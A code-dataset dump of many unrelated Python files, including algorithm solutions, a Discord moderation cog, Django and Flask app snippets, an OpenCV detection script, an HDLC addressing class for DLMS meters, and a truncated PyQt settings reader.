| StarcoderdataPython |
1630216 | <reponame>Zhenye-Na/LxxxCode<gh_stars>10-100
import sys


class Solution:
"""
@param: nums: An integer array
@return: A list of integers includes the index of the first number and the index of the last number
"""
def continuousSubarraySum(self, nums):
# write your code here
if not nums or len(nums) == 0:
return [0, 0]
prefix_sum, min_sum, max_sum = 0, 0, -sys.maxsize
i, j, min_idx = -1, -1, -1
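        # Prefix-sum trick: the best-sum subarray ending at `idx` equals the current
        # prefix sum minus the smallest prefix sum seen at an earlier index.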
for idx, num in enumerate(nums):
prefix_sum += num
if prefix_sum - min_sum > max_sum:
max_sum = prefix_sum - min_sum
i, j = min_idx + 1, idx
if prefix_sum < min_sum:
min_sum = prefix_sum
min_idx = idx
return [i, j]
| StarcoderdataPython |
4841846 | # type: ignore
__all__ = ["conda_search_reqs"]
def conda_search_reqs(requirements) -> set:
conda_reqs = set()
for req in requirements.registered_imports:
# look up req (imported module name) in database compiled in advance
pass
return conda_reqs
| StarcoderdataPython |
15058 | import sys
import io
input_txt = """
44
"""
sys.stdin = io.StringIO(input_txt)
tmp = input()
# copy the below part and paste to the submission form.
# ---------function------------
def fibonacci(n):
if n <= 1:
return 1
    fib_array = [1] * (n + 1)  # size the table to the requested index instead of a fixed 45
for i in range(2, n+1):
fib_array[i] = fib_array[i-1] + fib_array[i-2]
return fib_array[n]
def main():
n = int(input())
fib = fibonacci(n)
print(fib)
return
main()
# -----------------------------
sys.stdin = sys.__stdin__
| StarcoderdataPython |
196377 | <gh_stars>1-10
import discord
from discord.ext import commands
from datetime import datetime
class ChannelCommands(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
@commands.has_permissions(manage_channels=True)
async def lock(self, ctx, channel : discord.TextChannel=None):
channel = channel or ctx.channel
overwrite = channel.overwrites_for(ctx.guild.default_role)
overwrite.send_messages = False
await channel.set_permissions(ctx.guild.default_role, overwrite=overwrite)
await ctx.send('Channel locked.')
@commands.command()
@commands.has_permissions(manage_channels=True)
async def unlock(self, ctx):
await ctx.channel.set_permissions(ctx.guild.default_role, send_messages=True)
await ctx.send(ctx.channel.mention + " ***has been unlocked.***")
# Channel Errors
# @lock.error
# async def lock_error(ctx, error):
# if isinstance(error,commands.CheckFailure):
# await ctx.send('You do not have permission to use this command!')
def setup(client):
client.add_cog(ChannelCommands(client))
| StarcoderdataPython |
3286050 | <reponame>alexbigkid/ingredients_for_cooking<gh_stars>0
"""Main program for displaying ingredients list for shopping with the recipes liked"""
# Standard library imports
import sys
# Third party imports
from colorama import Fore, Style
# Local application imports
from ingredients_input import IngredientsInput
from search_recipes_by_ingredients import SearchRecipesByIngredients
from recipe_view import RecipeView
from shopping_list import ShoppingList
from recipe_price_breakdown import RecipePriceBreakdown
def get_ingredients():
ingredients_input = IngredientsInput()
ingredients_input.ask_for_ingredients()
return ingredients_input.read_input()
def get_recipes(ingredients):
search_recipes = SearchRecipesByIngredients()
return search_recipes.get_recipes(ingredients)
def get_liked_recipes(recipes):
recipe_selection = RecipeView(recipes)
recipe_selection.show_recipe_list()
return recipe_selection.get_liked_recipe_list()
def get_price_info(liked_recipe_list):
recipe_price = RecipePriceBreakdown(liked_recipe_list)
return recipe_price.get_price_breakdown()
def show_shopping_list(liked_recipe_list, price_info_list):
shopping_list = ShoppingList(liked_recipe_list, price_info_list)
shopping_list.print_price_per_recipe()
shopping_list.print_final_result()
def main():
exit_code = 0
try:
ingredient_list = get_ingredients()
# ingredient_list = ['garlic', 'ginger', 'granny smith apple']
recipe_list = get_recipes(ingredient_list)
liked_recipe_list = get_liked_recipes(recipe_list)
price_info_list = get_price_info(liked_recipe_list)
show_shopping_list(liked_recipe_list, price_info_list)
except Exception as exception:
        print(Fore.RED + "ERROR: failed to get recipes for your favorite ingredients")
print(f"{exception}{Style.RESET_ALL}")
exit_code = 1
sys.exit(exit_code)
if __name__ == '__main__':
main()
| StarcoderdataPython |
107791 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
requirements = ('numpy', 'opencv-python', 'solt==0.1.8', 'pyyaml',
'torch>=1.3.1', 'tqdm', 'scikit-learn', 'tensorboard', 'dill', 'matplotlib',
'pandas', 'pretrainedmodels', 'pillow==6.1',
'segmentation-models-pytorch')
setup_requirements = ()
test_requirements = ('pytest',)
description = """Deep Learning framework for reproducible science. From Finland with love."""
setup(
author="<NAME>, <NAME>, <NAME>",
author_email='<EMAIL>, <EMAIL>, <EMAIL>,',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux'
],
description="Deep Learning Framework for Reproducible Science",
install_requires=requirements,
license="MIT license",
long_description=description,
include_package_data=True,
keywords='data augmentations, deeep learning',
name='collagen',
packages=find_packages(include=['collagen']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/MIPT-Oulu/Collagen',
version='0.0.1',
zip_safe=False,
)
| StarcoderdataPython |
3221976 | #!/usr/bin/python3
# INP 1A Nancy Tetris
import pygame
pygame.init()
pygame.font.init()
from game import Game
game = Game()
game.run() | StarcoderdataPython |
3392357 | <reponame>vt-sailbot/sailbot<gh_stars>1-10
import socket, sys, json, time, modules.utils, autonomous, logging
from modules.utils import SocketType, socket_connect
logger = logging.getLogger('log')
# Define the global values, as generated by the configuration file
values = {}
def main():
arduino_sock = socket_connect(SocketType.arduino)
rudder_sock = socket_connect(SocketType.rudder)
winch_sock = socket_connect(SocketType.winch)
logger.debug('Built sockets!')
time.sleep(1)
logger.info('Starting sail boat RC control!')
time.sleep(2)
# Enter the main loop
while True:
try:
arduino_sock.send(str(0).encode('utf-8'))
states = json.loads(arduino_sock.recv(128).decode('utf-8'))
rudder_angle = float(states['rudder']) * float(values['max_rudder_angle'])
winch_angle = (float(states['winch']) * 20) + 60
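            # The normalized winch value is mapped onto a 60-80 degree servo range,
            # while the rudder value is scaled by the configured maximum rudder angle.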
set_angle(rudder_sock, rudder_angle)
set_angle(winch_sock, winch_angle)
logger.info("Set %0.5f and %0.5f" % (winch_angle, rudder_angle))
if states['switch']:
generate_error('Leaving manual control for autonomous!')
autonomous.main()
generate_error('Manual control caught exited autonomous process! Continuing!')
except Exception as e:
logger.error("%r error!" % (e.__class__.__name__))
time.sleep(0.25)
# Define servo control methods
def set_angle(connection, angle):
connection.send(str(angle).encode('utf-8'))
if __name__ == '__main__':
modules.utils.setup_config(values)
if values['debug']:
modules.utils.setup_logging()
modules.utils.setup_terminal_logging()
logger.debug('Read configuration values!')
try:
main()
except:
logger.critical("Shutting down!")
time.sleep(2)
modules.utils.shutdown_terminal()
| StarcoderdataPython |
3386092 | <filename>examples/matplotlib_chart.py
# Make it run from the examples directory
import sys
sys.path.append("..")
import pandas as pd
import numpy as np
from liquer import *
import liquer.ext.lq_pandas
import liquer.ext.lq_matplotlib
from flask import Flask
import liquer.blueprint as bp
app = Flask(__name__)
app.register_blueprint(bp.app, url_prefix='/liquer')
@app.route('/')
@app.route('/index.html')
def index():
return """<h1><a href="https://matplotlib.org/">Matplotlib</a> chart app</h1>
<ul>
<li><a href="/liquer/q/data/data.html">data</a></li>
<li><a href="/liquer/q/data/data.csv">data (csv)</a></li>
<li><a href="/liquer/q/data/mpl-xy-xcol-ycol">chart</a></li>
<li><a href="/liquer/q/data/mpl-xy-xcol-ycol">chart</a></li>
<li><a href="/liquer/q/sin_cos_chart/sin_cos_chart.png">png</a>,
<a href="/liquer/q/sin_cos_chart/sin_cos_chart.svg">svg</a>,
<a href="/liquer/q/sin_cos_chart/sin_cos_chart.pdf">pdf</a></li>
</ul>
"""
@first_command
def data():
x = np.linspace(0,2*np.pi,100)
y = np.sin(x)
return pd.DataFrame(dict(xcol=x,ycol=y))
@first_command
def sin_cos_chart():
import matplotlib.pyplot as plt
x = np.linspace(0,2*np.pi,100)
fig, ax = plt.subplots()
ax.plot(x,np.sin(x))
ax.plot(x,np.cos(x))
return fig
if __name__ == '__main__':
evaluate_and_save("data/mpl-xy-xcol-ycol/matplotlib_chart.png")
# evaluate_and_save("sin_cos_chart/sin_cos_chart.png")
# evaluate_and_save("sin_cos_chart/sin_cos_chart.pdf")
app.run() | StarcoderdataPython |
3200792 | # EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
#
# ==============================================================================
# Authors: <NAME>
#
# Python Class: Base class for ***
#
# License:
# ==============================================================================
# Copyright 2007-2016 Technische Universitaet Dresden - Germany
# Chair of VLSI-Design, Diagnostics and Architecture
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
import shutil
from datetime import datetime
from os import chdir
from Base import IHost
from lib.Functions import Init
from lib.Parser import ParserException
from Base.Exceptions import CommonException, SkipableCommonException
from Base.Logging import ILogable
from Base.Project import ToolChain, Tool, VHDLVersion, Environment
from DataBase.Solution import VirtualProject, FileListFile
__api__ = [
'to_time',
'Shared'
]
__all__ = __api__
# local helper function
def to_time(seconds):
"""
Convert *n* seconds to a :py:class:`str` with this pattern: "{min}:{sec:02}".
:type seconds: int
:param seconds: Number of seconds to be converted.
:rtype: str
:return: Returns a string formatted as #:##. E.g. "1:05"
"""
minutes = int(seconds / 60)
seconds = seconds - (minutes * 60)
return "{min}:{sec:02}".format(min=minutes, sec=seconds)
class Shared(ILogable):
"""
Base class for Simulator and Compiler.
:type host: object
:param host: The hosting instance for this instance.
:type dryRun: bool
:param dryRun: Enable dry-run mode
:type noCleanUp: bool
:param noCleanUp: Don't clean up after a run.
"""
ENVIRONMENT = Environment.Any
TOOL_CHAIN = ToolChain.Any
TOOL = Tool.Any
VHDL_VERSION = VHDLVersion.VHDL2008
class __Directories__:
Working = None
PoCRoot = None
def __init__(self, host : IHost, dryRun):
ILogable.__init__(self, host.Logger if isinstance(host, ILogable) else None)
self._host = host
self._dryRun = dryRun
self._pocProject = None
self._directories = self.__Directories__()
self._toolChain = None
self._vhdlVersion = self.VHDL_VERSION
self._vhdlGenerics = None
self._testSuite = None
self._startAt = datetime.now()
self._endAt = None
self._lastEvent = self._startAt
self._prepareTime = None
# class properties
# ============================================================================
@property
def Host(self): return self._host
@property
def DryRun(self): return self._dryRun
@property
def VHDLVersion(self): return self._vhdlVersion
@property
def PoCProject(self): return self._pocProject
@property
def Directories(self): return self._directories
def _GetTimeDeltaSinceLastEvent(self):
now = datetime.now()
result = now - self._lastEvent
self._lastEvent = now
return result
def _PrepareEnvironment(self):
# create fresh temporary directory
self.LogVerbose("Creating fresh temporary directory.")
if (self.Directories.Working.exists()):
self._PrepareEnvironment_PurgeDirectory()
# self.LogDebug("Purging temporary directory: {0!s}".format(self.Directories.Working))
# for item in self.Directories.Working.iterdir():
# try:
# if item.is_dir():
# shutil.rmtree(str(item))
# elif item.is_file():
# item.unlink()
# except OSError as ex:
# raise CommonException("Error while deleting '{0!s}'.".format(item)) from ex
else:
self._PrepareEnvironment_CreatingDirectory()
# self.LogDebug("Creating temporary directory: {0!s}".format(self.Directories.Working))
# try:
# self.Directories.Working.mkdir(parents=True)
# except OSError as ex:
# raise CommonException("Error while creating '{0!s}'.".format(self.Directories.Working)) from ex
self._PrepareEnvironment_ChangeDirectory()
# change working directory to temporary path
# self.LogVerbose("Changing working directory to temporary directory.")
# self.LogDebug("cd \"{0!s}\"".format(self.Directories.Working))
# try:
# chdir(str(self.Directories.Working))
# except OSError as ex:
# raise CommonException("Error while changing to '{0!s}'.".format(self.Directories.Working)) from ex
def _PrepareEnvironment_PurgeDirectory(self):
self.LogDebug("Purging temporary directory: {0!s}".format(self.Directories.Working))
for item in self.Directories.Working.iterdir():
try:
if item.is_dir():
shutil.rmtree(str(item))
elif item.is_file():
item.unlink()
except OSError as ex:
raise CommonException("Error while deleting '{0!s}'.".format(item)) from ex
def _PrepareEnvironment_CreatingDirectory(self):
self.LogDebug("Creating temporary directory: {0!s}".format(self.Directories.Working))
try:
self.Directories.Working.mkdir(parents=True)
except OSError as ex:
raise CommonException("Error while creating '{0!s}'.".format(self.Directories.Working)) from ex
def _PrepareEnvironment_ChangeDirectory(self):
"""Change working directory to temporary path 'temp/<tool>'."""
self.LogVerbose("Changing working directory to temporary directory.")
self.LogDebug("cd \"{0!s}\"".format(self.Directories.Working))
try:
chdir(str(self.Directories.Working))
except OSError as ex:
raise CommonException("Error while changing to '{0!s}'.".format(self.Directories.Working)) from ex
def _Prepare(self):
self.LogNormal("Preparing {0}.".format(self.TOOL.LongName))
def _CreatePoCProject(self, projectName, board):
# create a PoCProject and read all needed files
self.LogVerbose("Creating PoC project '{0}'".format(projectName))
pocProject = VirtualProject(projectName)
# configure the project
pocProject.RootDirectory = self.Host.Directories.Root
pocProject.Environment = self.ENVIRONMENT
pocProject.ToolChain = self.TOOL_CHAIN
pocProject.Tool = self.TOOL
pocProject.VHDLVersion = self._vhdlVersion
pocProject.Board = board
self._pocProject = pocProject
def _AddFileListFile(self, fileListFilePath):
self.LogVerbose("Reading filelist '{0!s}'".format(fileListFilePath))
# add the *.files file, parse and evaluate it
# if (not fileListFilePath.exists()): raise SimulatorException("Files file '{0!s}' not found.".format(fileListFilePath)) from FileNotFoundError(str(fileListFilePath))
try:
fileListFile = self._pocProject.AddFile(FileListFile(fileListFilePath))
fileListFile.Parse(self._host)
fileListFile.CopyFilesToFileSet()
fileListFile.CopyExternalLibraries()
self._pocProject.ExtractVHDLLibrariesFromVHDLSourceFiles()
except (ParserException, CommonException) as ex:
raise SkipableCommonException("Error while parsing '{0!s}'.".format(fileListFilePath)) from ex
self.LogDebug("=" * 78)
self.LogDebug("Pretty printing the PoCProject...")
self.LogDebug("{DARK_RED}Disabled{NOCOLOR}".format(**Init.Foreground))
# self.LogDebug(self._pocProject.pprint(2))
self.LogDebug("=" * 78)
if (len(fileListFile.Warnings) > 0):
for warn in fileListFile.Warnings:
self.LogWarning(warn)
raise SkipableCommonException("Found critical warnings while parsing '{0!s}'".format(fileListFilePath))
def _GetHDLParameters(self, configSectionName):
"""Parse option 'HDLParameters' for Verilog Parameters / VHDL Generics."""
result = {}
hdlParameters = self.Host.PoCConfig[configSectionName]["HDLParameters"]
if (len(hdlParameters) > 0):
for keyValuePair in hdlParameters.split(";"):
try:
key,value = keyValuePair.split("=")
except ValueError:
raise CommonException("Syntax error in option 'HDLParameters' within section {section}.".format(section=configSectionName))
result[key.strip()] = value.strip()
return result
| StarcoderdataPython |
125312 | <reponame>dynamicguy/photomatic
__author__ = 'ferdous'
import celery
from celery.task import PeriodicTask
from datetime import timedelta, datetime
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
@celery.task
class AlbumTask(PeriodicTask):
"""
    A periodic task that imports photos from Facebook.
"""
run_every = timedelta(minutes=100)
TODAY = datetime.now()
name = "photomatic.tasks.AlbumTask"
def run(self, **kwargs):
logger.info("Running fb album periodic task.")
return True
| StarcoderdataPython |
1731031 | from jchart import Chart
from .models import Customer
class TaxSubPieChart(Chart):
chart_type = 'pie'
responsive = False
def get_datasets(self, **kwargs):
print(f'{kwargs}')
tax_pay = Customer.objects.filter(vat__in=['ctvrtletne', 'mesicne'])
submitted = tax_pay.filter(submitted_tax=True)
return [{
'label': 'Podaná přiznání',
'data': [len(submitted), len(tax_pay) - len(submitted)],
'backgroundColor': ["#FF6384", "#36A2EB"],
'hoverBackgroundColor': ["#FF6384", "#36A2EB"],
}]
def get_labels(self, **kwargs):
return ['Podaná přiznání', 'Nepodaná přiznání']
class PapersPieChart(Chart):
chart_type = 'pie'
responsive = False
def get_datasets(self, **kwargs):
all_customers_cnt = len(Customer.objects.filter(papers__isnull=False))
papers_cnt = len(Customer.objects.filter(papers=True))
return [{
'label': 'Donesené doklady',
'data': [papers_cnt, all_customers_cnt - papers_cnt],
'backgroundColor': ["#FF6384", "#36A2EB"],
'hoverBackgroundColor': ["#FF6384", "#36A2EB"],
}]
def get_labels(self, **kwargs):
return ['Donesené doklady', 'Nedonesené doklady']
| StarcoderdataPython |
1748406 | import sys
import os
currentdir = os.path.dirname(__file__)
homedir = os.path.join(currentdir,"..")
sys.path.append(homedir)
| StarcoderdataPython |
3249948 | <gh_stars>1-10
# coding=utf-8
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^login/$', 'oecloud_dashboard.views.login'),
]
| StarcoderdataPython |
132700 | <reponame>adrianboratyn/TripRecommendations
import pandas as pd
import os.path
from django.core.management.base import BaseCommand, CommandError
import logging
from travels.models import Trip, TripDates
import datetime
import random
class Command(BaseCommand):
"""
    Class for creating trip types
"""
help = "Creating fields in Trips"
trips = Trip.objects.all().filter(country="Wyspy Zielonego Przylądka")
def handle(self, *args, **options):
"""
        Method for creating trip types
Args:
*args ():
**options ():
"""
for trip in self.trips:
            trip.countryEN = "Cape Verde"
trip.currency = "CVE"
trip.climate = "Morski"
trip.rating = random.uniform(1, 6)
trip.save()
| StarcoderdataPython |
103541 | import os
import cv2 as cv
import numpy as np
import tensorflow as tf
CWD_PATH = os.getcwd()
MODEL_NAME = "scribbler_graph_board_v3/"
# PATH_TO_CKPT = '{}frozen_inference_graph.pb'.format(MODEL_NAME)
PATH_TO_CKPT = "{}opt_graph.pb".format(MODEL_NAME)
PATH_TO_LABELS = "object-detection.pbtxt"
cvNet = cv.dnn.readNetFromTensorflow(PATH_TO_CKPT, "graph.pbtxt")
img = cv.imread("example.jpg")
rows = img.shape[0]
cols = img.shape[1]
cvNet.setInput(cv.dnn.blobFromImage(img, size=(300, 300), swapRB=True, crop=False))
cvOut = cvNet.forward()
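# Each detection row is laid out as [batch_id, class_id, confidence, left, top,
# right, bottom], with the box coordinates normalized to the [0, 1] range.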
for detection in cvOut[0, 0, :, :]:
score = float(detection[2])
if score > 0.3:
left = detection[3] * cols
top = detection[4] * rows
right = detection[5] * cols
bottom = detection[6] * rows
cv.rectangle(
img,
(int(left), int(top)),
(int(right), int(bottom)),
(23, 230, 210),
thickness=2,
)
cv.imshow("img", img)
cv.waitKey()
| StarcoderdataPython |
3337350 | import abc
from zipline import protocol
from zipline.finance import asset_restrictions
from pluto.coms.utils import conversions
from pluto.control.controllable import synchronization_states as ss
from protos import clock_pb2
class Market(abc.ABC):
@abc.abstractmethod
def add_blotter(self, session_id):
raise NotImplementedError
@abc.abstractmethod
def get_transactions(self, dt, evt, signals):
raise NotImplementedError
@abc.abstractmethod
def get_blotter(self, session_id):
'''
Parameters
----------
session_id
Returns
-------
'''
raise NotImplementedError
class NoopMarket(Market):
def add_blotter(self, session_id):
pass
def get_transactions(self, dt, evt, signals):
return
def get_blotter(self, session_id):
return
class LiveSimulationMarket(Market):
def __init__(self, data_portal, data_frequency, universe, calendar, blotter_factory):
'''
Parameters
----------
data_portal
calendars
universe
blotter_factory: pluto.control.modes.market.blotter_factory.SimulationBlotterFactory
'''
self._dp = dtp = data_portal
self._sst = sst = ss.Tracker(universe.calendars)
sst.state = sst.out_session
self._blotter_factory = blotter_factory
self._current_dt = None
self._universe = universe
self._current_data = protocol.BarData(
data_portal=dtp,
simulation_dt_func=self.current_dt,
data_frequency=data_frequency,
trading_calendar=calendar,
# restrictions are assumed to be included in the universe
restrictions=asset_restrictions.NoRestrictions()
)
self._data_frequency = data_frequency
super(LiveSimulationMarket, self).__init__()
def current_dt(self):
return self._current_dt
def get_transactions(self, dt, evt, signals):
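        # Aggregate the incoming clock event; on TRADE_END (or on every BAR when
        # running at minute frequency) collect transactions and commissions from each
        # blotter, and on SESSION_START apply any splits to assets with open orders.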
s = self._sst.aggregate(dt, evt, signals)
if s:
dt, e, exchanges = s
self._current_dt = t = conversions.to_datetime(dt)
if e == clock_pb2.TRADE_END:
for blotter in self._blotter_factory.blotters:
new_transactions, new_commissions, closed_orders = \
blotter.get_transactions(self._current_data)
blotter.prune_orders(closed_orders)
yield new_transactions, new_commissions
elif e == clock_pb2.BAR and self._data_frequency == 'minute':
for blotter in self._blotter_factory.blotters:
new_transactions, new_commissions, closed_orders = \
blotter.get_transactions(self._current_data)
blotter.prune_orders(closed_orders)
yield new_transactions, new_commissions
elif e == clock_pb2.SESSION_START:
assets = []
blotters = self._blotter_factory.blotters
for blotter in self._blotter_factory.blotters:
assets.extend(blotter.open_orders.keys())
if assets:
splits = self._dp.get_splits(assets, t)
if splits:
for blotter in blotters:
blotter.process_splits(splits)
def add_blotter(self, session_id):
self._blotter_factory.add_blotter(
session_id,
self._universe)
def get_blotter(self, session_id):
return self._blotter_factory.get_blotter(session_id)
# whats this?
class MarketAggregate(Market):
def __init__(self):
self._markets = []
def add_market(self, market):
self._markets.append(market)
def get_transactions(self, dt, evt, signals):
for market in self._markets:
yield market.get_transactions(dt, evt, signals)
def add_blotter(self, session_id):
for market in self._markets:
market.add_blotter(session_id)
| StarcoderdataPython |
3261956 | from django.contrib import admin
from .models import Post,reviewsData,reportPost,Comments
# Register your models here.
admin.site.register(Post)
admin.site.register(reviewsData)
admin.site.register(reportPost)
admin.site.register(Comments) | StarcoderdataPython |
3366989 | # Define the application directory
import os
# Statement for enabling the development environment
DEBUG = True
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
# Define the database - we are working with
DATABASE = {
"engine": "mysql",
"database": "app",
"host": "localhost",
"port": "3306",
"username": "root",
"password": "",
}
# Application threads. A common general assumption is
# using 2 per available processor cores - to handle
# incoming requests using one and performing background
# operations using the other.
THREADS_PER_PAGE = 2
# Enable protection agains *Cross-site Request Forgery (CSRF)*
CSRF_ENABLED = True
# Use a secure, unique and absolutely secret key for
# signing the data.
CSRF_SESSION_KEY = "secret"
# Secret key for signing cookies
SECRET_KEY = "secret"
| StarcoderdataPython |
112281 | <reponame>telefonicaid/fiware-cloto<gh_stars>1-10
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright 2014 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with <EMAIL>
#
__author__ = 'arobres'
REST_PATH = '../../../../manage.py'
POLICY_MANAGER_IP = 'fiwarecloto'
POLICY_MANAGER_PORT = 8000
FACTS_IP = 'fiwarecloto'
FACTS_PORT = 5000
RABBIT_IP = 'rabbitmq'
AUTH_TOKEN_OLD = ''
KEYSTONE_URL = ''
TENANT_ID = ''
TENANT_NAME = ''
USER = ''
PASSWORD = ''
CONTENT_TYPE = 'application/json'
HEADERS = {'content-type': CONTENT_TYPE, 'X-Auth-Token': ''}
DB_PATH = '../../../../cloto.db'
MOCK_IP = u'127.0.0.1'
MOCK_PORT = 8080
MOCK_PATH = u'commons/server_mock.py'
| StarcoderdataPython |
3273 | from typing import *
import attr
from dlms_cosem.hdlc import validators
@attr.s(auto_attribs=True)
class HdlcAddress:
"""
A client address shall always be expressed on one byte.
To enable addressing more than one logical device within a single physical device
    and to support the multi-drop configuration, the server address may be divided
    into two parts:
The logical address to address a logical device (separate addressable entity
within a physical device) makes up the upper HDLC address
The logical address must always be present.
    The physical address is used to address a physical device (a physical device on
    a multi-drop).
    The physical address can be omitted if it is not used.
"""
logical_address: int = attr.ib(validator=[validators.validate_hdlc_address])
physical_address: Optional[int] = attr.ib(
default=None, validator=[validators.validate_hdlc_address]
)
address_type: str = attr.ib(
default="client", validator=[validators.validate_hdlc_address_type]
)
@property
def length(self):
"""
The number of bytes the address makes up.
:return:
"""
return len(self.to_bytes())
def to_bytes(self):
out: List[Optional[int]] = list()
if self.address_type == "client":
# shift left 1 bit and set the lsb to mark end of address.
out.append(((self.logical_address << 1) | 0b00000001))
else:
# server address type
logical_higher, logical_lower = self._split_address(self.logical_address)
if self.physical_address:
physical_higher, physical_lower = self._split_address(
self.physical_address
)
# mark physical lower as end
physical_lower = physical_lower | 0b00000001
out.extend(
[logical_higher, logical_lower, physical_higher, physical_lower]
)
else:
# no physical address so mark the logial as end.
logical_lower = logical_lower | 0b00000001
out.extend([logical_higher, logical_lower])
out_bytes = list()
for address in out:
if address:
out_bytes.append(address.to_bytes(1, "big"))
return b"".join(out_bytes)
@staticmethod
def _split_address(address: int) -> Tuple[Optional[int], int]:
higher: Optional[int]
lower: int
if address > 0b01111111:
lower = (address & 0b0000000001111111) << 1
higher = (address & 0b0011111110000000) >> 6
else:
lower = address << 1
higher = None
return higher, lower
@staticmethod
def _address_to_byte(address: int) -> bytes:
return address.to_bytes(1, "big")
@classmethod
def destination_from_bytes(cls, frame_bytes: bytes, address_type: str):
destination_address_data, _ = HdlcAddress.find_address_in_frame_bytes(
frame_bytes
)
(
destination_logical,
destination_physical,
destination_length,
) = destination_address_data
return cls(destination_logical, destination_physical, address_type)
@classmethod
def source_from_bytes(cls, frame_bytes: bytes, address_type: str):
_, source_address_data = HdlcAddress.find_address_in_frame_bytes(frame_bytes)
source_logical, source_physical, source_length = source_address_data
return cls(source_logical, source_physical, address_type)
@staticmethod
def find_address_in_frame_bytes(
hdlc_frame_bytes: bytes,
) -> Tuple[Tuple[int, Optional[int], int], Tuple[int, Optional[int], int]]:
"""
address can be 1, 2 or 4 bytes long. the end byte is indicated by the of
the last byte LSB being 1
The first address is the destination address and the seconds is the
source address.
:param frame_bytes:
:return:
"""
# Find destination address.
destination_length: int = 1
destination_logical: int = 0
destination_physical: Optional[int] = 0
destination_positions_list: List[Tuple[int, int]] = [(3, 1), (4, 2), (6, 4)]
address_bytes: bytes
for pos, _length in destination_positions_list:
end_byte = hdlc_frame_bytes[pos]
if bool(end_byte & 0b00000001):
# Found end byte:
destination_length = _length
break
continue
if destination_length == 1:
address_bytes = hdlc_frame_bytes[3].to_bytes(1, "big")
destination_logical = address_bytes[0] >> 1
destination_physical = None
elif destination_length == 2:
address_bytes = hdlc_frame_bytes[3:5]
destination_logical = address_bytes[0] >> 1
destination_physical = address_bytes[1] >> 1
elif destination_length == 4:
address_bytes = hdlc_frame_bytes[3:7]
destination_logical = HdlcAddress.parse_two_byte_address(address_bytes[:2])
            destination_physical = HdlcAddress.parse_two_byte_address(address_bytes[2:])
# Find source address
source_length: int = 1
source_logical: int = 0
source_physical: Optional[int] = 0
source_position_list: List[Tuple[int, int]] = [
(item[0] + destination_length, item[1])
for item in destination_positions_list
]
for pos, _length in source_position_list:
end_byte = hdlc_frame_bytes[pos]
if bool(end_byte & 0b00000001):
# Found end byte:
source_length = _length
break
continue
if source_length == 1:
address_bytes = hdlc_frame_bytes[3 + destination_length].to_bytes(1, "big")
source_logical = address_bytes[0] >> 1
source_physical = None
elif source_length == 2:
            address_bytes = hdlc_frame_bytes[3 + destination_length : 5 + destination_length]
source_logical = address_bytes[0] >> 1
source_physical = address_bytes[1] >> 1
        elif source_length == 4:
            address_bytes = hdlc_frame_bytes[3 + destination_length : 7 + destination_length]
            source_logical = HdlcAddress.parse_two_byte_address(address_bytes[:2])
            source_physical = HdlcAddress.parse_two_byte_address(address_bytes[2:])
return (
(destination_logical, destination_physical, destination_length),
(source_logical, source_physical, source_length),
)
@staticmethod
def parse_two_byte_address(address_bytes: bytes):
        if len(address_bytes) != 2:
            raise ValueError("Can only parse 2 bytes for address")
upper = address_bytes[0] >> 1
lower = address_bytes[1] >> 1
return lower + (upper << 7)
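# Illustrative usage only (not part of the original module). The address values
# below are assumptions chosen for demonstration; real values come from the
# meter/client configuration.
if __name__ == "__main__":
    client = HdlcAddress(logical_address=16, address_type="client")
    server = HdlcAddress(logical_address=1, physical_address=17, address_type="server")
    print(client.to_bytes())  # single byte: logical address shifted left, LSB marks the end
    print(server.to_bytes())  # logical part then physical part, LSB set on the last byte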
| StarcoderdataPython |
48916 | from typing import Callable, Awaitable
CoroutineFunction = Callable[..., Awaitable]
| StarcoderdataPython |
198197 | <gh_stars>0
"""
settings.py
-----------
Implements functions for reading and writing UI configuration using a QSettings object.
"""
from PyQt5 import QtWidgets
from instruments import triggering
import re
MPTS_trigger_file = ".config/MPTS_config.txt"
regex = re.compile('(\S+)[\s*]=[\s*]"(\S+)"')
def read_settings(config, ui):
"""Reads configuration from the ini-file.
Uses default values if no settings are found.
"""
# General
ui.comboBoxOperationMode.setCurrentIndex(config.value("OperationMode", 3, type=int))
ui.checkBoxContinuouslyUpdate.setChecked(config.value("ContinuouslyUpdate", True, type=bool))
ui.CamerasFrameRate.setValue(config.value("CamerasFrameRate", 10900, type=int))
ui.CamerasExposureTime.setValue(config.value("CamerasExposureTime", 100, type=int))
ui.Operator.setText(config.value("Operator", "", type=str))
ui.Email.setText(config.value("Email", "", type=str))
ui.Aim.setText(config.value("Aim", "", type=str))
ui.Comments.setPlainText(config.value("Comments", "", type=str))
# Laser PS
ui.LaserPSSerialPort.setText(config.value("LaserPS/SerialPort", "COM1", type=str))
ui.LaserPSMainVoltage.setValue(config.value("LaserPS/MainVoltage", None, type=int))
